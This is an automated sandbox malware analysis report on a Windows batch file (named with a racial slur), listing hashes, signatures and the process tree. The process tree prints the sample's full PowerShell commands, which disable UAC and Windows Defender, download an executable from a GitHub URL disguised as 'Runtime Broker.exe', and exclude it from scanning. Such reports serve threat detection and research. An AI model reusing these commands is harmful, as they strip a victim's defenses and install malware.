Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23/03/2025, 22:49
Static task
static1
Behavioral task
behavioral1
Sample
nigga2.bat
Resource
win7-20240903-en
General
-
Target
nigga2.bat
-
Size
1KB
-
MD5
06aafbdb0650ecee01c1bdb6b7b51fdb
-
SHA1
ad8c1f0ca620d813ce8e3280139817db583f9c4e
-
SHA256
3b5953d3ea0420345b5c1e9efdbb88ea80bcaa99f2582834c2cd545efa84880c
-
SHA512
039a8ca7db486f7c473a07c22c4269c211fc44175d3fb480eeaf5435df23a70151927940b0bf6a7bbc29b12b1d9a84ab5240686e05cc9daae0d54920d2d84fb9
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3032 powershell.exe 2432 powershell.exe 2092 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2776 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2092 powershell.exe 2432 powershell.exe 3032 powershell.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2944 taskmgr.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
pid Process 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe 2944 taskmgr.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2152 wrote to memory of 2092 2152 cmd.exe 32 PID 2152 wrote to memory of 2092 2152 cmd.exe 32 PID 2152 wrote to memory of 2092 2152 cmd.exe 32 PID 2152 wrote to memory of 2432 2152 cmd.exe 33 PID 2152 wrote to memory of 2432 2152 cmd.exe 33 PID 2152 wrote to memory of 2432 2152 cmd.exe 33 PID 2152 wrote to memory of 2776 2152 cmd.exe 34 PID 2152 wrote to memory of 2776 2152 cmd.exe 34 PID 2152 wrote to memory of 2776 2152 cmd.exe 34 PID 2152 wrote to memory of 3032 2152 cmd.exe 35 PID 2152 wrote to memory of 3032 2152 cmd.exe 35 PID 2152 wrote to memory of 3032 2152 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\nigga2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ExecutionPolicy Unrestricted -Force; Set-ItemProperty -Path 'REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0; Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -SubmitSamplesConsent 2; Set-Service -Name WinDefend -StartupType Disabled; Stop-Service -Name WinDefend;"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/pizq3/dfsdfdfs/releases/download/sex/File.1.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\system32\timeout.exetimeout /t 22⤵
- Delays execution with timeout.exe
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2944
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CI2LMJIM5N34PY1P45UB.temp
Filesize7KB
MD51de9dfc2c02b7f3028b9ac732d39518b
SHA1055c6575d90d461bdd64057b3fe580b2e8fb526b
SHA2561180d61286fca322d606c8434d9c06591a7ff355ea1ab4c6657a519c46e46e6a
SHA5126f629cbe470fcd0b9904f607a905d784ee1cab7707b5f709211be9073e3410e65ddddeddd8f0bfcd76db0ca6bd08f8fd5392f8b7102d2480464bd2cb74081ed2